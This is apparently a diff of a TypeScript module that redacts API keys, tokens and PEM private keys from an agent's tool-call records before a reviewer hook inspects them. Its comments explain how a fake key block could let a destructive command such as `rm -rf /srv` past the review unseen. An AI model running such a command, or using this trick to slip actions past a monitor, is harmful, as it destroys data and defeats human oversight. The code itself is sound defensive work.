// ── Layer 1: the shared floor ────────────────────────────────────────────────
|
|
175
|
-
|
|
176
|
-
/**
|
|
177
|
-
* `SECRET_PATTERNS`, made global — and, for the ones that end in a token
|
|
178
|
-
* character class, extended to the END of the token they matched.
|
|
179
|
-
*
|
|
180
|
-
* The extension is what stops a partial redaction leaking the tail of a key.
|
|
181
|
-
* `sk-[A-Za-z0-9]{20,}` stops at the first `-`, so a LiteLLM key whose 21st
|
|
182
|
-
* character is a hyphen used to come out as `<redacted:OpenAI API key>-x7Qd`.
|
|
183
|
-
* `ghp_[A-Za-z0-9]{36}` and `AKIA[A-Z0-9]{16}` are fixed-width and would do the
|
|
184
|
-
* same to anything longer. The two patterns that end on a literal (`…@` for
|
|
185
|
-
* connection strings, `-----` for a PEM header) are not extended: what follows
|
|
186
|
-
* them is a hostname or a newline, not more of the secret.
|
|
187
|
-
*
|
|
188
|
-
* `SECRET_PATTERNS` is read, never extended. It is the list the default-on
|
|
189
|
-
* `sanitize-*` builtins match, and those answer a match by REPLACING the whole
|
|
190
|
-
* tool result with a marker — so a pattern added there for the redactor's
|
|
191
|
-
* benefit denies ordinary output to every user who never enabled Jev. The
|
|
192
|
-
* gateway-key shapes the redactor needs live in `VENDOR_RULES` below, which is
|
|
193
|
-
* this file's own and runs on the envelope path only.
|
|
194
|
-
*/
|
|
195
|
-
/**
|
|
196
|
-
* T3's SCAN FORM of the shared patterns, kept here because this is where the
|
|
197
|
-
* shared floor is compiled. The boundary and the bound below are what make the
|
|
198
|
-
* floor LINEAR over a whole envelope; `atTokenBoundary` cannot do that job,
|
|
199
|
-
* because it is asked AFTER the engine has already matched, and the cost being
|
|
200
|
-
* bounded here is the engine's scan itself.
|
|
201
|
-
*/
|
|
202
|
-
/**
|
|
203
|
-
* How far an open-ended run of a NEGATED character class — `[^@\s]+`, the
|
|
204
|
-
* userinfo of a connection string — is followed before the pattern gives up.
|
|
205
|
-
*
|
|
206
|
-
* A negated class is the expensive shape: it admits anything, so the engine
|
|
207
|
-
* scans to the end of the string and backtracks looking for the delimiter, at
|
|
208
|
-
* EVERY position where the pattern's prefix occurs. `postgres://` repeated to
|
|
209
|
-
* the string cap is one such position every eleven characters over a run as
|
|
210
|
-
* long as the cap, and cost 217 ms of synchronous hook time per string at the
|
|
211
|
-
* 56,000 cap this was measured at.
|
|
212
|
-
*
|
|
213
|
-
* 256 is two orders of magnitude more than a real `user:pass@` and an order of
|
|
214
|
-
* magnitude more than a long generated password. Past it the connection string
|
|
215
|
-
* is not redacted — which is a leak of a credential nobody writes, not a hole
|
|
216
|
-
* in the review: an unredacted span removes nothing, so it hides nothing, and
|
|
217
|
-
* {@link couldNotBeSecret} is not reached either.
|
|
218
|
-
*/
|
|
219
|
-
const MAX_DELIMITED_RUN = 256;
|
|
220
|
-
|
|
221
|
-
/**
|
|
222
|
-
* A secret does not start in the middle of a word — where "word" means a run
|
|
223
|
-
* of THIS PATTERN'S own charset, not one fixed idea of one.
|
|
224
|
-
*
|
|
225
|
-
* This is what makes the POSITIVE runs linear, and it is worth stating why,
|
|
226
|
-
* because the bound above cannot do it: `JWT_RE`'s segments are
|
|
227
|
-
* `[A-Za-z0-9_-]{10,}` and a JWT payload really can be thousands of characters
|
|
228
|
-
* long, so bounding them either misses live tokens or leaves the cost in.
|
|
229
|
-
* `eyJ` repeated put a candidate start every three characters inside one run
|
|
230
|
-
* as long as the string cap: 934 ms at the 56,000 cap it was measured at, and
|
|
231
|
-
* quadratic, so worse at the cap this build uses.
|
|
232
|
-
*
|
|
233
|
-
* With this lookbehind a candidate must be preceded by a character OUTSIDE the
|
|
234
|
-
* run's charset — and such a character ENDS the run. So each candidate owns a
|
|
235
|
-
* disjoint stretch of the string, the total work is one pass, and the measured
|
|
236
|
-
* cost of the same input is 2 ms. What it gives up is a secret glued to the
|
|
237
|
-
* end of a word with no delimiter of any kind (`...abceyJhbGci...`), which no
|
|
238
|
-
* real token, header, URL, assignment or JSON string produces.
|
|
239
|
-
*
|
|
240
|
-
* `-` is the character that argument gets WRONG when it is applied to every
|
|
241
|
-
* pattern at once, and it shipped that way: one global
|
|
242
|
-
* `(?<![A-Za-z0-9_-])` made a hyphen a word character for ALL of them, so
|
|
243
|
-
* `-Authorization: Bearer <token>` — a unified-diff removal line, which is
|
|
244
|
-
* most of what an agent writes when it edits a config — and the hyphenated
|
|
245
|
-
* header names `Proxy-Authorization` and `X-Authorization` reached Jev with
|
|
246
|
-
* the token in clear. `-sk-…`, `-AKIA…`, `-ghp_…` and a connection string on
|
|
247
|
-
* a diff line went out the same way. A hyphen is a DELIMITER far more often
|
|
248
|
-
* than it is the inside of a token, so the default is
|
|
249
|
-
* {@link NOT_MID_WORD}, which does not list it.
|
|
250
|
-
*
|
|
251
|
-
* A pattern only needs the hyphen back when its own run could have eaten one
|
|
252
|
-
* AND something after that run can fail — the shape that backtracks. That is
|
|
253
|
-
* `JWT_RE` and nothing else here (`sk-ant-[A-Za-z0-9\-_]{20,}` and the bearer
|
|
254
|
-
* token both END in their open-ended run, so a failing candidate reads fewer
|
|
255
|
-
* than its minimum and stops). For those, {@link NOT_MID_HYPHENATED_WORD}
|
|
256
|
-
* keeps the disjointness argument and still admits a diff line: a candidate
|
|
257
|
-
* may also be preceded by a single `-` that is ITSELF preceded by a character
|
|
258
|
-
* outside the run (or by the start of the string). That character ends the
|
|
259
|
-
* run just as before, so two candidates still own disjoint stretches — the
|
|
260
|
-
* outside character of the later one sits at or after the start of the
|
|
261
|
-
* earlier one, which bounds the earlier one's scan — and `-eyJ` repeated,
|
|
262
|
-
* where every hyphen is preceded by a `J`, yields ONE candidate rather than
|
|
263
|
-
* 14,000. Both branches are lookbehinds of at most two characters, so neither
|
|
264
|
-
* adds backtracking; {@link scanForm} picks between them from the pattern's
|
|
265
|
-
* own source, and `__tests__/hooks/semantic/envelope-budget.test.ts` pins the
|
|
266
|
-
* COST as well as the redaction.
|
|
267
|
-
*
|
|
268
|
-
* What the hyphenated branch gives up, said plainly: a JWT glued DIRECTLY to
|
|
269
|
-
* a hyphenated word with nothing else between them (`Proxy-eyJhbGci…`) is
|
|
270
|
-
* still not a candidate, because admitting one there is admitting one at
|
|
271
|
-
* every hyphen. That is the same residual as a secret glued to the end of a
|
|
272
|
-
* word, it is not how a header, a diff line, a URL, an assignment or a JSON
|
|
273
|
-
* string writes a token, and the alternative measured quadratic.
|
|
274
|
-
*/
|
|
275
|
-
const NOT_MID_WORD = "(?<![A-Za-z0-9_])";
|
|
276
|
-
/** {@link NOT_MID_WORD} for a pattern whose own open-ended run can contain `-`. */
|
|
277
|
-
const NOT_MID_HYPHENATED_WORD = "(?:(?<![A-Za-z0-9_-])|(?<=(?:^|[^A-Za-z0-9_-])-))";
|
|
278
|
-
|
|
279
|
-
/** `+`, `*` or `{n,}` — a quantifier with no upper bound. */
|
|
280
|
-
const OPEN_ENDED = /^(?:(\+)|(\*)|\{(\d+),\})/;
|
|
281
|
-
|
|
282
|
-
/**
|
|
283
|
-
* Bound every open-ended run of a negated character class in a pattern source.
|
|
284
|
-
*
|
|
285
|
-
* A linear scan of the source, not a regex over it: it copies escapes and
|
|
286
|
-
* character classes whole, and only rewrites a quantifier that directly
|
|
287
|
-
* follows a `[^…]` class. A positive class is left alone — {@link NOT_MID_WORD}
|
|
288
|
-
* is what bounds those, and a bound would cost live tokens (see above).
|
|
289
|
-
*
|
|
290
|
-
* Deliberately narrow: a quantifier applied to a GROUP containing a negated
|
|
291
|
-
* class (`(?:[^@\s])+`) is not rewritten, because unwrapping groups is where a
|
|
292
|
-
* source rewriter starts changing what a pattern means. No shape in
|
|
293
|
-
* `SECRET_PATTERNS` is written that way today, and
|
|
294
|
-
* `__tests__/hooks/semantic/envelope-budget.test.ts` pins the COST rather than
|
|
295
|
-
* the spelling, so a future pattern that reintroduces the blow-up fails there
|
|
296
|
-
* rather than in production.
|
|
297
|
-
*/
|
|
298
|
-
function boundDelimitedRuns(source: string): { source: string; hyphenRun: boolean; backtracks: boolean } {
|
|
299
|
-
let out = "";
|
|
300
|
-
let i = 0;
|
|
301
|
-
let hyphenRun = false;
|
|
302
|
-
let backtracks = false;
|
|
303
|
-
while (i < source.length) {
|
|
304
|
-
const c = source[i];
|
|
305
|
-
if (c === "\\") {
|
|
306
|
-
out += source.slice(i, i + 2);
|
|
307
|
-
i += 2;
|
|
308
|
-
continue;
|
|
309
|
-
}
|
|
310
|
-
if (c !== "[") {
|
|
311
|
-
out += c;
|
|
312
|
-
i += 1;
|
|
313
|
-
continue;
|
|
314
|
-
}
|
|
315
|
-
let j = i + 1;
|
|
316
|
-
const negated = source[j] === "^";
|
|
317
|
-
if (negated) j += 1;
|
|
318
|
-
const bodyStart = j;
|
|
319
|
-
// A `]` as the first member of a class is a literal `]`, not the end of it.
|
|
320
|
-
if (source[j] === "]") j += 1;
|
|
321
|
-
while (j < source.length && source[j] !== "]") j += source[j] === "\\" ? 2 : 1;
|
|
322
|
-
const body = source.slice(bodyStart, j);
|
|
323
|
-
out += source.slice(i, j + 1);
|
|
324
|
-
i = j + 1;
|
|
325
|
-
const open = OPEN_ENDED.exec(source.slice(i));
|
|
326
|
-
if (!open) continue;
|
|
327
|
-
if (!negated) {
|
|
328
|
-
// A POSITIVE run is left alone — NOT_MID_WORD is what bounds those, and
|
|
329
|
-
// a bound would cost live tokens (see above). What is recorded is the
|
|
330
|
-
// one thing the lookbehind has to know: this run could have eaten a `-`,
|
|
331
|
-
// and there is more pattern after it that can FAIL, so a candidate that
|
|
332
|
-
// starts inside such a run backtracks over the whole of it.
|
|
333
|
-
// More pattern after an open-ended positive run is the shape that
|
|
334
|
-
// backtracks: a candidate reads to the end of the run and then fails,
|
|
335
|
-
// from every position the prefix occurs at. That, and only that, is what
|
|
336
|
-
// the boundary below is paid for.
|
|
337
|
-
if (i + open[0].length < source.length) {
|
|
338
|
-
backtracks = true;
|
|
339
|
-
if (hasLiteralHyphen(body)) hyphenRun = true;
|
|
340
|
-
}
|
|
341
|
-
continue;
|
|
342
|
-
}
|
|
343
|
-
const min = open[3] !== undefined ? Number(open[3]) : open[1] !== undefined ? 1 : 0;
|
|
344
|
-
// Never narrower than the pattern's own floor: a `{500,}` stays satisfiable.
|
|
345
|
-
out += `{${min},${Math.max(min, MAX_DELIMITED_RUN)}}`;
|
|
346
|
-
i += open[0].length;
|
|
347
|
-
}
|
|
348
|
-
return { source: out, hyphenRun, backtracks };
|
|
349
|
-
}
|
|
350
|
-
|
|
351
|
-
/**
|
|
352
|
-
* Whether a character class lists `-` as a MEMBER rather than as a range.
|
|
353
|
-
*
|
|
354
|
-
* `[A-Za-z0-9_-]` and `[A-Za-z0-9\-._~+/]` do; `[A-Z]` does not. The rule is
|
|
355
|
-
* the one the language uses: a `-` is a range only with a member on each side
|
|
356
|
-
* of it, so an escaped one, or one at either end of the body, is a member.
|
|
357
|
-
* Wrong in the "it is a member" direction only costs a pattern the hyphen
|
|
358
|
-
* boundary it has today, which is the safe way to be wrong.
|
|
359
|
-
*/
|
|
360
|
-
function hasLiteralHyphen(body: string): boolean {
|
|
361
|
-
for (let i = 0; i < body.length; i++) {
|
|
362
|
-
if (body[i] === "\\") {
|
|
363
|
-
if (body[i + 1] === "-") return true;
|
|
364
|
-
i++;
|
|
365
|
-
continue;
|
|
366
|
-
}
|
|
367
|
-
if (body[i] === "-" && (i === 0 || i === body.length - 1)) return true;
|
|
368
|
-
}
|
|
369
|
-
return false;
|
|
370
|
-
}
|
|
371
|
-
|
|
372
|
-
/**
|
|
373
|
-
* The SCAN FORM of a shared pattern: the same matches on anything anyone
|
|
374
|
-
* writes, at a cost that is linear in the length of the string.
|
|
375
|
-
*
|
|
376
|
-
* `SECRET_PATTERNS` is shared with the `sanitize-*` builtins, where it is a
|
|
377
|
-
* detector run over short command strings. Here it is a TRANSFORM run over
|
|
378
|
-
* every string in an envelope, up to the whole budget, on the synchronous hook
|
|
379
|
-
* path before any `await` — so the 1,500 ms Jev timeout does not bound it and
|
|
380
|
-
* an agent's own tool call stalls behind it. The patterns are left as the
|
|
381
|
-
* builtins' authors wrote them and adapted here, rather than edited there,
|
|
382
|
-
* because the two call sites want different things from them.
|
|
383
|
-
*
|
|
384
|
-
* The source is wrapped in a non-capturing group so the lookbehind applies to
|
|
385
|
-
* the whole pattern rather than to the first branch of a top-level
|
|
386
|
-
* alternation.
|
|
387
|
-
*/
|
|
388
|
-
function scanForm(re: RegExp, extend: boolean): RegExp {
|
|
389
|
-
const bounded = boundDelimitedRuns(re.source);
|
|
390
|
-
// The extension is appended INSIDE the boundary's scope and at the very end,
|
|
391
|
-
// where nothing after it can fail — so it is a run that cannot backtrack and
|
|
392
|
-
// the disjointness argument above still holds.
|
|
393
|
-
const body = extend ? `(?:${bounded.source})[A-Za-z0-9_-]*` : bounded.source;
|
|
394
|
-
const flags = re.flags.includes("g") ? re.flags : `${re.flags}g`;
|
|
395
|
-
/**
|
|
396
|
-
* The boundary goes ONLY on a pattern that can backtrack, which is the one
|
|
397
|
-
* place it earns its cost — and it has a real cost, which is why this is not
|
|
398
|
-
* applied to the whole list.
|
|
399
|
-
*
|
|
400
|
-
* A lookbehind drops the regex JIT to its interpreter (see `atTokenBoundary`
|
|
401
|
-
* above). Measured here over the shared floor against 32 KB of ordinary
|
|
402
|
-
* prose: 0.13 ms with no boundary, 19.35 ms with one on every pattern, and
|
|
403
|
-
* 2.14 ms with one only where it is load-bearing. Two of the thirteen shared
|
|
404
|
-
* patterns need it — the JWT and the PEM armour header, both of which have an
|
|
405
|
-
* open-ended positive run with more pattern after it — and for those it is
|
|
406
|
-
* what turns the quadratic into a scan: `eyJ` repeated over 32 KB is 472 ms
|
|
407
|
-
* unbounded and 2.0 ms here.
|
|
408
|
-
*
|
|
409
|
-
* So both sides' measurements were right and neither generalised: T3 was
|
|
410
|
-
* comparing a boundary against a blow-up, T6 against ordinary text. The
|
|
411
|
-
* predicate is what reconciles them, and `redaction-cost.test.ts` and
|
|
412
|
-
* `envelope-budget.test.ts` pin the two ends of it.
|
|
413
|
-
*/
|
|
414
|
-
if (!bounded.backtracks) return new RegExp(body, flags);
|
|
415
|
-
const boundary = bounded.hyphenRun ? NOT_MID_HYPHENATED_WORD : NOT_MID_WORD;
|
|
416
|
-
return new RegExp(`${boundary}(?:${body})`, flags);
|
|
417
|
-
}
|
|
418
|
-
|
|
419
|
-
/**
|
|
420
|
-
* The shared floor, in scan form and extended to the end of the token it
|
|
421
|
-
* matched.
|
|
422
|
-
*
|
|
423
|
-
* Two independent transforms, and both are load-bearing:
|
|
424
|
-
*
|
|
425
|
-
* - `scanForm` (T3) makes the floor LINEAR over a whole envelope — a
|
|
426
|
-
* boundary the engine checks BEFORE it commits, and a bound on the one
|
|
427
|
-
* negated run that has no boundary to give it one.
|
|
428
|
-
* - the extension (T6) stops a partial redaction leaking the tail of a key.
|
|
429
|
-
*
|
|
430
|
-
* `extend` is decided from the ORIGINAL source, never the bounded one:
|
|
431
|
-
* `boundDelimitedRuns` rewrites a trailing `+` into `{1,256}`, so asking the
|
|
432
|
-
* rewritten source whether it ends in `}` or `+` would extend the connection
|
|
433
|
-
* string — whose `@` terminator is a hostname boundary, not more of the secret.
|
|
434
|
-
*/
|
|
435
|
-
const SHARED_RULES: ReadonlyArray<readonly [RegExp, string]> = SECRET_PATTERNS.map(
|
|
436
|
-
([re, label]) => [scanForm(re, /[}+]$/.test(re.source)), label] as const,
|
|
437
|
-
);
|
|
438
|
-
|
|
439
|
-
/** Exposed for the test that pins which shared patterns are extended. */
|
|
440
|
-
export const SHARED_PATTERN_EXTENDED: ReadonlyArray<boolean> = SECRET_PATTERNS.map(([re]) => /[}+]$/.test(re.source));
|
|
441
|
-
|
|
442
|
-
// ── Layer 2: the redactor's margin ───────────────────────────────────────────
|
|
443
|
-
|
|
444
|
-
/**
|
|
445
|
-
* A whole PEM private-key block, header to footer.
|
|
446
|
-
*
|
|
447
|
-
* The shared pattern matches the `BEGIN … PRIVATE KEY` armour header only —
|
|
448
|
-
* enough for a detector, useless for a redactor, which would replace the header
|
|
449
|
-
* and send the base64 key body underneath it. Each header is walked to its own
|
|
450
|
-
* footer if it has one (`PEM_BODY_RUN_RE`), and otherwise takes the lines that
|
|
451
|
-
* follow it while they still look like key material (base64 of 16+ characters,
|
|
452
|
-
* or an encrypted key's `Proc-Type:`-style header line), separated by real or
|
|
453
|
-
* JSON-escaped newlines — a block whose footer the envelope's length cap cut
|
|
454
|
-
* away (`redactPemBlocks` adds a last line shorter than that when it ends the
|
|
455
|
-
* text or meets the cut marker: a block cut mid-line). A lone header in a
|
|
456
|
-
* command — a `grep` for the armour line across `*.pem` — therefore takes
|
|
457
|
-
* nothing after it. The body of a complete block is limited to what a PEM body
|
|
458
|
-
* contains, so a header and a footer quoted separately in documentation do not
|
|
459
|
-
* take the prose between them.
|
|
460
|
-
*
|
|
461
|
-
* "JSON-escaped" is one to four backslashes before the `n`: a block inside a
|
|
462
|
-
* JSON string that was itself serialised again (a service-account file passed
|
|
463
|
-
* as a string argument, then stringified by the envelope at depth 2) arrives as
|
|
464
|
-
* `\\n`. The count is bounded so a run of backslashes cannot backtrack.
|
|
465
|
-
*/
|
|
466
|
-
const PEM_ARMOUR_HEAD = String.raw`-----BEGIN[ A-Z0-9]*PRIVATE KEY(?: BLOCK)?-----`;
|
|
467
|
-
/** Every armour header in the text; the block after each one is measured in code. */
|
|
468
|
-
const PEM_HEADER_RE = new RegExp(PEM_ARMOUR_HEAD, "g");
|
|
469
|
-
/**
|
|
470
|
-
* The longest run of characters a PEM body may contain, anchored at a header.
|
|
471
|
-
*
|
|
472
|
-
* It replaces the lazy `(?:body)*?-----END…` scan the rule used to open with.
|
|
473
|
-
* That scan read to the end of the string before failing whenever no footer
|
|
474
|
-
* FOR A PRIVATE KEY followed — from every header in the text, which made a
|
|
475
|
-
* page of repeated armour lines (a `grep` hit list across a key directory)
|
|
476
|
-
* quadratic, at up to 576 strings per envelope. Choosing the alternative on
|
|
477
|
-
* `text.includes("-----END")` only moved the hole: eight characters of an
|
|
478
|
-
* unrelated `-----END CERTIFICATE-----` put every header back on the lazy
|
|
479
|
-
* path, and 2 000 characters of armour cost 1.5 ms again.
|
|
480
|
-
*
|
|
481
|
-
* A footer is reachable from a header exactly when it starts inside this run,
|
|
482
|
-
* because a body character is the only thing the lazy scan could cross. The
|
|
483
|
-
* run is the same for every start position inside it, so it is computed once
|
|
484
|
-
* per run rather than once per header, and the whole walk stays linear.
|
|
485
|
-
*/
|
|
486
|
-
const PEM_BODY_RUN_RE = /(?:[A-Za-z0-9+/=\s:,.-]|\\{1,4}[nrt])*/y;
|
|
487
|
-
/** The key lines of a block whose footer the envelope's cap cut away. */
|
|
488
|
-
const PEM_TO_CUT = String.raw`(?:(?:\s|\\{1,4}[nrt])+(?:[A-Za-z0-9+/=]{16,}|[A-Za-z-]+:[^\n\\]*))*`;
|
|
489
|
-
const PEM_TO_CUT_RE = new RegExp(PEM_TO_CUT, "y");
|
|
490
|
-
/**
|
|
491
|
-
* The short tail of a key line a cut split, right after a block that lost its
|
|
492
|
-
* footer. Matched in code at the end of such a block: as an optional group at
|
|
493
|
-
* the end of the block regex it cost that regex ~8x on every string.
|
|
494
|
-
*/
|
|
495
|
-
const PEM_CUT_FRAGMENT_RE = /(?:\s|\\{1,4}[nrt])+[A-Za-z0-9+/=]{1,15}(?=\s*(?:$|…\[))/y;
|
|
496
|
-
|
|
497
|
-
/** Shorter than this and a base64 line is not key material worth removing. */
|
|
498
|
-
const MIN_KEY_LINE = 16;
|
|
499
|
-
const KEY_BODY_MARK = marker("private key");
|
|
500
|
-
/** A line break inside a PEM span: a real one, or a JSON-escaped one. */
|
|
501
|
-
const PEM_LINE_BREAK_RE = /\r\n|[\r\n]|\\{1,4}[nrt]/g;
|
|
502
|
-
|
|
503
|
-
/** Base64 and base64url, the charsets a PEM body is written in. One linear pass. */
|
|
504
|
-
function isBase64Run(line: string): boolean {
|
|
505
|
-
if (line.length === 0) return false;
|
|
506
|
-
for (let i = 0; i < line.length; i++) {
|
|
507
|
-
const c = line[i];
|
|
508
|
-
const ok =
|
|
509
|
-
(c >= "A" && c <= "Z") || (c >= "a" && c <= "z") || (c >= "0" && c <= "9") || c === "+" || c === "/" || c === "=" || c === "-" || c === "_";
|
|
510
|
-
if (!ok) return false;
|
|
511
|
-
}
|
|
512
|
-
return true;
|
|
513
|
-
}
|
|
514
|
-
|
|
515
|
-
/** A line long enough, and pure enough, to be key material worth removing. */
|
|
516
|
-
const isKeyMaterialLine = (line: string): boolean => line.length >= MIN_KEY_LINE && isBase64Run(line);
|
|
517
|
-
|
|
518
|
-
/**
|
|
519
|
-
* A block's own armour line, which goes WITH the key material rather than
|
|
520
|
-
* surviving beside it.
|
|
521
|
-
*
|
|
522
|
-
* This is the one thing the two sides of this file disagreed about, and the
|
|
523
|
-
* disagreement turned out to be narrower than it looked: T3 needed the lines
|
|
524
|
-
* INSIDE a block that are not key material — an encrypted key's `Proc-Type:`
|
|
525
|
-
* headers, and anything a fake block was built around — to survive and be
|
|
526
|
-
* judged. It never needed the `BEGIN`/`END` delimiters themselves. T6 needed
|
|
527
|
-
* the block to read as ONE redaction, which it cannot if its own armour is
|
|
528
|
-
* left behind for the shared floor to match separately. Taking the armour and
|
|
529
|
-
* keeping everything else satisfies both.
|
|
530
|
-
*/
|
|
531
|
-
const PEM_ARMOUR_LINE_RE = /^-----(?:BEGIN|END)[ A-Z0-9]*PRIVATE KEY(?: BLOCK)?-----$/;
|
|
532
|
-
|
|
533
|
-
/**
|
|
534
|
-
* Whether an ALREADY-TRIMMED line is removed with the key: key material, or
|
|
535
|
-
* the block's own armour. Module-level rather than a closure inside
|
|
536
|
-
* `redactKeyMaterial`, which is called once per header in the text.
|
|
537
|
-
*/
|
|
538
|
-
function goesWithTheKey(trimmed: string): boolean {
|
|
539
|
-
return isKeyMaterialLine(trimmed) || PEM_ARMOUR_LINE_RE.test(trimmed);
|
|
540
|
-
}
|
|
541
|
-
|
|
542
|
-
/**
|
|
543
|
-
* Remove the KEY MATERIAL from a block's span, LINE BY LINE, keeping every
|
|
544
|
-
* other line.
|
|
545
|
-
*
|
|
546
|
-
* T3's rule, kept over T6's whole-span marker, and this is the one place the
|
|
547
|
-
* two sides of this file actually disagreed. A redaction is the one thing here
|
|
548
|
-
* that removes text WITHOUT reporting a cut, so dropping everything between a
|
|
549
|
-
* BEGIN and an END would make a fake key block a place to hide a command —
|
|
550
|
-
* `envelope-budget.test.ts` drives exactly that, and the span rule let
|
|
551
|
-
* `rm -rf /srv` through silently, because a command is inside
|
|
552
|
-
* `PEM_BODY_RUN_RE`'s charset. A key body is base64 and a command needs
|
|
553
|
-
* whitespace, so every line that is not base64 is kept and judged, and an
|
|
554
|
-
* encrypted key's `Proc-Type:` headers survive as the honest rendering they
|
|
555
|
-
* are.
|
|
556
|
-
*
|
|
557
|
-
* What T6 keeps is WHICH SPAN a block owns: the footer search, the
|
|
558
|
-
* JSON-escaped newlines, and the block whose footer the envelope's cap cut
|
|
559
|
-
* away. Only what happens INSIDE the span is T3's.
|
|
560
|
-
*
|
|
561
|
-
* The removed lines go on the scrub list individually rather than as one span.
|
|
562
|
-
* Both reasons matter: a copy of a key line elsewhere in the envelope is then
|
|
563
|
-
* matched, and `couldNotBeSecret` (./envelope.ts) is asked about base64 with
|
|
564
|
-
* no newline in it, so a PEM redaction stays what T3 proved it was — a
|
|
565
|
-
* removal that cannot hide an operation, and therefore not a cut.
|
|
566
|
-
*/
|
|
567
|
-
function redactKeyMaterial(span: string, counter: Counter): string {
|
|
568
|
-
PEM_LINE_BREAK_RE.lastIndex = 0;
|
|
569
|
-
const firstBreak = PEM_LINE_BREAK_RE.exec(span);
|
|
570
|
-
// `lastIndex` is deliberately NOT reset here: the loop below resumes from it.
|
|
571
|
-
// (A failed `exec` resets it to 0 on its own, so the early return is clean.)
|
|
572
|
-
if (firstBreak === null) {
|
|
573
|
-
// One line, no break — the lone armour header a `grep` across a key
|
|
574
|
-
// directory produces, hundreds of times in a single string. Decided
|
|
575
|
-
// without the piece walk: the general path allocates an object and trims
|
|
576
|
-
// twice per line, which is nothing on a real key block and everything on
|
|
577
|
-
// a line of 1 200 repeated headers (`redaction.test.ts`'s cost case).
|
|
578
|
-
const only = span.trim();
|
|
579
|
-
if (!goesWithTheKey(only)) return span;
|
|
580
|
-
counter.n++;
|
|
581
|
-
if (isKeyMaterialLine(only)) counter.found.push(only);
|
|
582
|
-
return KEY_BODY_MARK;
|
|
583
|
-
}
|
|
584
|
-
const pieces: Array<{ text: string; sep: string; key: boolean }> = [];
|
|
585
|
-
let at = 0;
|
|
586
|
-
for (let m: RegExpExecArray | null = firstBreak; m !== null; m = PEM_LINE_BREAK_RE.exec(span)) {
|
|
587
|
-
const line = span.slice(at, m.index);
|
|
588
|
-
pieces.push({ text: line, sep: m[0], key: goesWithTheKey(line.trim()) });
|
|
589
|
-
at = m.index + m[0].length;
|
|
590
|
-
}
|
|
591
|
-
PEM_LINE_BREAK_RE.lastIndex = 0;
|
|
592
|
-
if (at < span.length) {
|
|
593
|
-
const line = span.slice(at);
|
|
594
|
-
pieces.push({ text: line, sep: "", key: goesWithTheKey(line.trim()) });
|
|
595
|
-
}
|
|
596
|
-
// A key line the cut split is SHORT, so the length floor would keep it — and
|
|
597
|
-
// it is still key material. Only ever the last piece of the span, and only
|
|
598
|
-
// when the run it belongs to is right in front of it.
|
|
599
|
-
const lastPiece = pieces.length - 1;
|
|
600
|
-
if (lastPiece > 0 && !pieces[lastPiece].key && pieces[lastPiece - 1].key && isBase64Run(pieces[lastPiece].text.trim())) {
|
|
601
|
-
pieces[lastPiece].key = true;
|
|
602
|
-
}
|
|
603
|
-
let out = "";
|
|
604
|
-
let inRun = false;
|
|
605
|
-
let runSep = "";
|
|
606
|
-
for (const p of pieces) {
|
|
607
|
-
if (p.key) {
|
|
608
|
-
if (!inRun) {
|
|
609
|
-
counter.n++;
|
|
610
|
-
inRun = true;
|
|
611
|
-
}
|
|
612
|
-
// Key material only. An armour line is removed with the block but is not
|
|
613
|
-
// a secret, and putting it on the scrub list would delete a `grep` for
|
|
614
|
-
// the armour line from everywhere else in the envelope.
|
|
615
|
-
const t = p.text.trim();
|
|
616
|
-
if (isKeyMaterialLine(t)) counter.found.push(t);
|
|
617
|
-
runSep = p.sep;
|
|
618
|
-
continue;
|
|
619
|
-
}
|
|
620
|
-
if (inRun) {
|
|
621
|
-
out += KEY_BODY_MARK + runSep;
|
|
622
|
-
inRun = false;
|
|
623
|
-
runSep = "";
|
|
624
|
-
}
|
|
625
|
-
out += p.text + p.sep;
|
|
626
|
-
}
|
|
627
|
-
if (inRun) out += KEY_BODY_MARK + runSep;
|
|
628
|
-
return out;
|
|
629
|
-
}
|
|
630
|
-
|
|
631
|
-
/** Every PEM private-key block, whole or cut short, with its key material gone. */
|
|
632
|
-
function redactPemBlocks(text: string, counter: Counter): string {
|
|
633
|
-
if (!text.includes("-----BEGIN")) return text;
|
|
634
|
-
const footers = pemFooters(text);
|
|
635
|
-
let fi = 0;
|
|
636
|
-
// The body run last measured, reused by every header that starts inside it.
|
|
637
|
-
let runFrom = -1;
|
|
638
|
-
let runEnd = -1;
|
|
639
|
-
let out = "";
|
|
640
|
-
let last = 0;
|
|
641
|
-
PEM_HEADER_RE.lastIndex = 0;
|
|
642
|
-
for (let m = PEM_HEADER_RE.exec(text); m !== null; m = PEM_HEADER_RE.exec(text)) {
|
|
643
|
-
const bodyStart = m.index + m[0].length;
|
|
644
|
-
while (fi < footers.length && footers[fi].start < bodyStart) fi++;
|
|
645
|
-
let end = -1;
|
|
646
|
-
if (fi < footers.length) {
|
|
647
|
-
if (bodyStart < runFrom || bodyStart > runEnd) {
|
|
648
|
-
PEM_BODY_RUN_RE.lastIndex = bodyStart;
|
|
649
|
-
runFrom = bodyStart;
|
|
650
|
-
runEnd = bodyStart + (PEM_BODY_RUN_RE.exec(text)?.[0].length ?? 0);
|
|
651
|
-
}
|
|
652
|
-
if (footers[fi].start <= runEnd) end = footers[fi].end;
|
|
653
|
-
}
|
|
654
|
-
if (end < 0) {
|
|
655
|
-
// No footer this block can reach: take the key lines the cap left.
|
|
656
|
-
PEM_TO_CUT_RE.lastIndex = bodyStart;
|
|
657
|
-
end = bodyStart + (PEM_TO_CUT_RE.exec(text)?.[0].length ?? 0);
|
|
658
|
-
PEM_CUT_FRAGMENT_RE.lastIndex = end;
|
|
659
|
-
const f = PEM_CUT_FRAGMENT_RE.exec(text);
|
|
660
|
-
if (f) end += f[0].length;
|
|
661
|
-
}
|
|
662
|
-
// The span is T6's; what survives inside it is T3's. `redactKeyMaterial`
|
|
663
|
-
// counts and records the runs it removes, so neither happens here.
|
|
664
|
-
out += text.slice(last, m.index) + redactKeyMaterial(text.slice(m.index, end), counter);
|
|
665
|
-
last = end;
|
|
666
|
-
PEM_HEADER_RE.lastIndex = end;
|
|
667
|
-
}
|
|
668
|
-
PEM_HEADER_RE.lastIndex = 0;
|
|
669
|
-
return last === 0 ? text : out + text.slice(last);
|
|
670
|
-
}
|
|
671
|
-
|
|
672
|
-
/** Where every private-key footer in the text sits, in one pass. */
|
|
673
|
-
function pemFooters(text: string): Array<{ start: number; end: number }> {
|
|
674
|
-
const out: Array<{ start: number; end: number }> = [];
|
|
675
|
-
if (!text.includes("-----END")) return out;
|
|
676
|
-
PEM_FOOTER_RE.lastIndex = 0;
|
|
677
|
-
for (let m = PEM_FOOTER_RE.exec(text); m !== null; m = PEM_FOOTER_RE.exec(text)) {
|
|
678
|
-
out.push({ start: m.index, end: m.index + m[0].length });
|
|
679
|
-
}
|
|
680
|
-
